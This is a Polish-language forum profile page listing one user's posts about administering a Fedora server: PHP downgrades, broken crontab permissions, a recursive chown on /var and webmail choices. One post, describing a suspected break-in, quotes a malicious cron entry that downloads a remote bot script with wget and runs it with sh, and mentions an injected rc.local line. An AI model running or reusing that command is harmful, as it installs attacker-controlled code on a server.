Skocz do zawartości

lukbok

Użytkownicy
  • Zawartość

    20
  • Rejestracja

  • Ostatnia wizyta

lukbok's Achievements

Użytkownik

Użytkownik (5/16)

0

Reputacja

  1. Witam, Ok, ale jak teraz zrobić aby apache widział to php54? PHP54 zainstalowało się w folderze /opt/remi/php54. Po wywołaniu strony index.php (z phpinfo) pojawia się pusta strona. Dodam, że polecenie php -v pokazuje właściwą wersję php-5.4.45.
  2. Witam, Znalazłem php54 w repozytorium Remi. Zainstalowałem z użyciem dnf ale w systemie jest jako php54. Mam nadzieję, że apache i to php54 będą razem działały. W poniedziałek będę to mógł sprawdzić.
  3. Witam, Zainstalowałem Fedorę 23. Niestety jest w niej php w wersji 5.6, a ja potrzebuję wersję 5.4 dlatego proszę o instrukcję jak przejść do wersji 5.4 Z góry dziękuję. Lukbok
  4. Ok. Już się na mnie wyżyliście. Po części macie rację. To jest taki domowy (dla członków rodziny) serwer: plików, poczty (obsługa kilku domen), www. Postawiłem go kilka lat temu (jak jeszcze bardziej siedziałem w linuxie) i zapomiałem o problemie. To było raczej takie hobby. Nie mam siły stawiać tego na nowo dlatego wykupiłem hosting i przeniosłem pocztę. Jako serwer plików kupię jakiś NAS i dam dyski w macierzy. Dziękuję i pozdrawiam
  5. właścicielem pliku crontab jest root (grupa root) i nie ma on żadnych uprawnień ----------- Co gorsza nie można ich zmienić - "nie można zmienić uprawnienia do crontab. Operacja niedozwolona" (a wydaję polecenie jako root)
  6. Witam, Przepraszam Was za ten chaos w mojej wypowiedzi ale jestem troszkę poddenerwowany całą tą sytuacją. Nie chciałem wklejać linków (obrazków), a jedynie tekst (własnie to poprawiłem). Szkoda, że polecacie postawienie serwer na nowo. Zajmie mi to chyba z tydzień i jakoś chcę tego uniknąć Dziękuję za informacje
  7. Witam serdecznie. Ze względu na to, że moja widza jest niewystarczająca proszę Was o pomoc w zdiagnozowaniu "włamania": System to fedora 18. Pracuje jako router, serwer www, imap, pop itd. Co wzbudziło moja podejrzenia: 1. bardzo duże obciążenie generowane przez proces /user/local/nagi dodam, że nie mam takiego katalogu. Po rozszerzeniu opisu ps -A -f otrzymałem: /usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg W systemie nie ma nagiosa, a tym bardziej folderu oraz pliku nrpe.cfg 2. był uruchomiony proces "b", a w pliku /etc/rc.d/rc.local był dodany (nie przeze mnie) wpis "/root/b" w katalogu /root/ nie ma pliku b 3. zauważyłem że adres bramki w "route" jest inny niż ten który dostałem od prowidera (z sieci dialog) i w ogóle się nie pokrywa z adresem zewnętrznym IP. w logach nie ma nic podejrzanego, a w secure.log są tylko moje logowania. Po wykasowaniu wpisu w rc.local oraz resecie serwera procesy b oraz nagiosa znikają ale po kilku tygodniach znowu się pojawiają. Witam ponownie w cronie znalazłem jeszcze takie wpisy: 1. root Nie wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh > 2. unbound Nie /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -c /etc/unbound/icannbundl ... narazie je wyłączyłem.
  8. Witam Po zaktualizowaniu fc18 nie można wykonac pliku /bin/crontab. Posiada on uprawnienia nie do wykonania i co gorsza nie można tego zmienić "brak dostepu" (jestem zalogowany jako root) Co z tym zrobić?
  9. Witam dla użytkowników chcę zainstalować jakiś webmail z dostępem przez www. Jednak chciałbym taki, który dodatkowo posiada kalendarz z możliwością tworzenia terminów i przypomnień. Czy możecie polecić jakieś rozwiązanie. Przeszukałem internet i wydaje się, że dobrym rozwiązaniem będzie squirremail z dodatkowymi pluginami. Jednak nie wiem czy będzie miał terminarz z przypomnieniami i czy zadania z kalendarza będzie można synchronizować z kalendarzem w komórkach z androidem. Pozdrawiam
  10. O to idzie, że w /var jest wiele plików np.: bazy danych postgresql, maile, hylafax itd. Przez to, że przez przypadek rekursywnie zmieniłem właściela i grupę na root serwer postgres przestał działać, a maile nie ładowały się do odpowiednich plików. Do tego doszły jeszcze inne problemy np. posfix nie chciał wysyłać. Te programy/serwery które przestały działać (przez to że nie działały) uruchomiłem. Pozostają jednak rzeczy których nie widać, a które mogą się ujawnić przy reboocie. Dlatego ciągle to sprawdzam i analizuje - szczególnie chodzi o /var/lib/. Ok. gdybym miał kopię /var to może bym do tego wrócił. Tylko teraz: do backupa używam aplikacji backup-manager. I jak widzę podczas wykonania kopi zmienia ona właściciela i grupę na plikach. Tak więc kopia /var też by mi nic nie dała ponieważ właściciel i grupa były zmienione.
  11. Dzięki wielkie. Większość się zgadzała poza tym, że nie mam użytkownika colord!. Jeśli już tak dyskutujemy po powiedz po co mam robić kopię logów? Jeśli serwer padnie to i tak muszę postawić go od nowa i logi na nic mi się nie przydadzą.
  12. CRM i bazy danych już pracują i generalnie wszystko działa. Jednak dla pewności chce wszystko sprawdzić. Backupy mam ale nie katalogu /var.
  13. Cześć Dziękuję za odpowiedź. Jest to sprzęt firmowy, który administruję i nie ma szans na reinstalację - działa wiele baz crm i innych któych konfiguracja zajmnie mi tydzień. Niektóre już pozmieniałem tak aby wszystko chodziło, ale jeszcze nie mam odwagi do uruchamiać ponownie. Dlatego jeśli mogę Cie prosić to wklej uprawnienia ze swojego systemu - będę dalej porównywał i zmianiał. Łukasz
  14. Ewentualnie, na co mam zwrócić uwagę aby system po restarcie wstał (do tej pory jeszcze go nie rebotowałem)?
  15. Cześć Właśnie, że zrobiłem to rekursywnie. Dzięki za wsparcie.
×
×
  • Dodaj nową pozycję...